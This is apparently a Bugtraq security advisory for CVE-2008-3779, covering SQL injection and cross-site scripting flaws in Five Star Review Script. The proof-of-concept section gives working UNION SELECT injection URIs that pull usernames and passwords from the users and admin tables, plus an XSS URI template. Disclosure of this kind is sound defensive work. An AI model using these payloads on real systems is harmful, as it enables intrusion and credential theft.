Five Star Review SQL Injection and Cross Site Scripting Vulnerabilities
BID:30808
Info
Five Star Review SQL Injection and Cross Site Scripting Vulnerabilities
| Bugtraq ID: | 30808 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-3779 |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 24 2008 12:00AM |
| Updated: | May 07 2015 05:24PM |
| Credit: | Mr.SQL |
| Vulnerable: |
Review-Script.com Five Star Review Script 0 |
| Not Vulnerable: | |
Discussion
Five Star Review SQL Injection and Cross Site Scripting Vulnerabilities
Five Star Review is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Five Star Review is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
Five Star Review SQL Injection and Cross Site Scripting Vulnerabilities
An attacker can exploit these issues via a browser. To exploit a cross-site scripting issue, the attacker must entice an unsuspecting victim to follow a malicious URI.
The following example URIs are available:
http://www.example.com/recommend.php?item_id=1'+union+select+0,concat_ws(0x3a,username,passtext),0,concat_ws(0x3a,username,passtext),0,0,0,0,0,0,0+from+review_users+limit+1,1/*
http://www.example.com/recommend.php?item_id=1'+union+select+0,concat_ws(0x3a,username,passtext),0,concat_ws(0x3a,username,passtext),0,0,0,0,0,0,0+from+review_admin/*
http://www.example.com/search/index.php?cmd=search&words= [[ XSS ]] &searchWhere=0&mode=normal
An attacker can exploit these issues via a browser. To exploit a cross-site scripting issue, the attacker must entice an unsuspecting victim to follow a malicious URI.
The following example URIs are available:
http://www.example.com/recommend.php?item_id=1'+union+select+0,concat_ws(0x3a,username,passtext),0,concat_ws(0x3a,username,passtext),0,0,0,0,0,0,0+from+review_users+limit+1,1/*
http://www.example.com/recommend.php?item_id=1'+union+select+0,concat_ws(0x3a,username,passtext),0,concat_ws(0x3a,username,passtext),0,0,0,0,0,0,0+from+review_admin/*
http://www.example.com/search/index.php?cmd=search&words= [[ XSS ]] &searchWhere=0&mode=normal
Solution / Fix
Five Star Review SQL Injection and Cross Site Scripting Vulnerabilities
Solution:
The vendor has released a patch. Contact the vendor for more information.
Solution:
The vendor has released a patch. Contact the vendor for more information.
References
Five Star Review SQL Injection and Cross Site Scripting Vulnerabilities
References:
References:
- Vendor Homepage (Review-Script.com)